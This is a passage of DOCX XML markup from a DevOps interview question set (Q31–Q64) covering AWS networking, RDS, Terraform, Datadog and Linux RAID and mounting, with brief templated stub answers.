    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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load balancer supports SSL termination?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. What backends can be attached to a Layer 7 Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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backends can be attached to a Layer 7 Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. What is an SSL certificate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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an SSL certificate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. How do you obtain an SSL certificate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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obtain an SSL certificate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. What information is required to obtain an SSL certificate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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information is required to obtain an SSL certificate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. Design a three-tier application on AWS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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Design a three-tier application on AWS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. Explain Route53 Resolver Inbound Endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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Route53 Resolver Inbound Endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. Explain Route53 Resolver Outbound Endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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Route53 Resolver Outbound Endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. Two VPCs need communication. How will you establish connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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Two VPCs need communication. How will you establish connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. What are the limitations of VPC Peering?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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the limitations of VPC Peering?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. Suppose an Auto Scaling Group has 10 instances behind a Load Balancer, but the application is inaccessible. How do you troubleshoot?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS Infrastructure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Suppose an Auto Scaling Group has 10 instances behind a Load Balancer, but the application is inaccessible. How do you troubleshoot?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. What does "Connection Reset by Peer" mean?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS Infrastructure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does "Connection Reset by Peer" mean?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. If the application is healthy, what else could cause Connection Reset by Peer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS Infrastructure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the application is healthy, what else could cause Connection Reset by Peer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. Multiple RDS instances have multiple Security Groups. Add one inbound rule to all of them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS RDS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS RDS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Multiple RDS instances have multiple Security Groups. Add one inbound rule to all of them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. Those resources are not managed by Terraform. How would you automate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS RDS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS RDS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Those resources are not managed by Terraform. How would you automate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. How would you discover all the required RDS instances?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS RDS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS RDS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discover all the required RDS instances?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. Can Terraform deploy resources to Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Terraform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Can Terraform deploy resources to Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. How does Terraform communicate with Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Terraform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Terraform communicate with Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. Can Terraform manage Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Terraform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Can Terraform manage Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. Can Terraform manage Datadog configurations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Datadog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Datadog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Can Terraform manage Datadog configurations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. Can Terraform configure alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Datadog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Datadog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Can Terraform configure alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Can Terraform configure dashboards?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Datadog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Datadog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Can Terraform configure dashboards?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. How does Terraform authenticate to Datadog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Datadog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Datadog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Terraform authenticate to Datadog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. How are Datadog API credentials passed during CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Datadog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Datadog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are Datadog API credentials passed during CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. What is RAID?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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is RAID?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Explain RAID 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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RAID 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. Explain RAID 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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RAID 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. Explain RAID 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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RAID 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. Explain RAID 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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RAID 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. What does mounting a filesystem mean?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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does mounting a filesystem mean?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. Which commands are used to mount a filesystem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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commands are used to mount a filesystem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. What happens after reboot if you only use the mount command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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happens after reboot if you only use the mount command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. How do you make a filesystem mount permanent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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make a filesystem mount permanent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q63. How do you troubleshoot a crashed Linux node?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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troubleshoot a crashed Linux node?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q64. How do you check whether a port is open from another server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
